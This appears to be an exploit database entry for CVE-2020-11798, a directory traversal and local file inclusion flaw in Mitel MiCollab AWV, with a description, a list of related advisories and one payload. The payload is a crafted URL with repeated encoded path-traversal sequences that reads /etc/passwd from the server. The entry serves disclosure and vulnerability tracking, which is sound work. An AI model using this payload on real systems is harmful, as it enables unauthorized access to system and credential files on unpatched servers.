Lucene search
Kahvi-01337DAY-ID-38530HistoryApr 06, 2023 - 12:00 a.m.
Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal / Local File Inclusion Vulnerability
2023-04-0600:00:00
Kahvi-0
0day.today
123
mitel micollab
awv
directory traversal
local file inclusion
vulnerability
mitel
web conference
exploit
cve-2020-11798
0.807 High
EPSS
Percentile
98.3%
# Exploit Title: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI
# Fix Date: 2020-05
# Exploit Author: Kahvi-0
# Github: https://github.com/Kahvi-0
# Vendor Homepage: https://www.mitel.com/
# Vendor Security Advisory: https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005
# Version: before 8.1.2.4 and 9.x before 9.1.3
# CVE: CVE-2020-11798
# CVE Reported By: Tri Bui
Description:
A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories
Payload:
https://[site]/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
Related
nuclei
nuclei
Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal
2023-08-25 06:08:13
nvd
nvd
CVE-2020-11798
2020-06-10 18:15:10
prion
prion
Directory traversal
2020-06-10 18:15:00
packetstorm
packetstorm
Mitel MiCollab AWV 8.1.2.4 / 9.1.3 Directory Traversal / LFI
2023-04-06 00:00:00
cvelist
cvelist
CVE-2020-11798
2020-06-10 00:00:00
cve
cve
CVE-2020-11798
2020-06-10 18:15:10
exploitdb
exploitdb
Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI
2023-04-06 00:00:00